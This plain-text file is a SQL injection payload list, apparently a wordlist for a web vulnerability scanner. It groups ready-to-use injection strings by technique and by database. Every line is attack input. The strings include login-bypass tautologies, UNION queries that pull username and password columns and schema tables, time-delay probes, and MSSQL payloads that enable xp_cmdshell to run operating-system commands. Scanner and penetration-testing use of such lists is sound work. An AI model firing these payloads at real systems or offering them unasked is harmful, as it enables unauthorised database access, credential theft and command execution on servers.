# SQL Injection Payloads for Web Vulnerability Scanner
# Basic payloads
'
"
1'
1"
1=1
' OR '1'='1
" OR "1"="1
' OR 1=1 --
" OR 1=1 --
' OR '1'='1' --
" OR "1"="1" --
admin' --
admin" --

# Error-based payloads
' OR 1=1 IN (SELECT @@version) --
" OR 1=1 IN (SELECT @@version) --
' AND 1=0 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
' AND 1=0 UNION ALL SELECT table_name FROM information_schema.tables --

# Time-based payloads
' WAITFOR DELAY '0:0:5' --
" WAITFOR DELAY '0:0:5' --
' OR IF(1=1, SLEEP(5), 0) --
" OR IF(1=1, SLEEP(5), 0) --
' OR pg_sleep(5) --
" OR pg_sleep(5) --

# Boolean-based payloads
' AND 1=1 --
" AND 1=1 --
' AND 1=2 --
" AND 1=2 --
' AND 'a'='a
" AND "a"="a
' AND 'a'='b
" AND "a"="b

# UNION-based payloads
' UNION SELECT 1 --
' UNION SELECT 1,2 --
' UNION SELECT 1,2,3 --
' UNION SELECT 1,2,3,4 --
' UNION SELECT 1,2,3,4,5 --
' UNION ALL SELECT 1,2,3,4,5,6 --
' UNION SELECT NULL,NULL,NULL,NULL,NULL --
' UNION SELECT username,password FROM users --
' UNION SELECT table_name,column_name FROM information_schema.columns --

# Database specific payloads
# MySQL
' OR 1=1 # 
' OR 1=1 -- -
' OR 1=1 LIMIT 1 --
' OR 1=1 ORDER BY 1 --

# MSSQL
'; EXEC xp_cmdshell('dir') --
'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE --

# PostgreSQL
'; SELECT pg_sleep(5) --
'; SELECT current_database() --

# Oracle
' OR 1=1 FROM dual --
' UNION SELECT NULL FROM dual --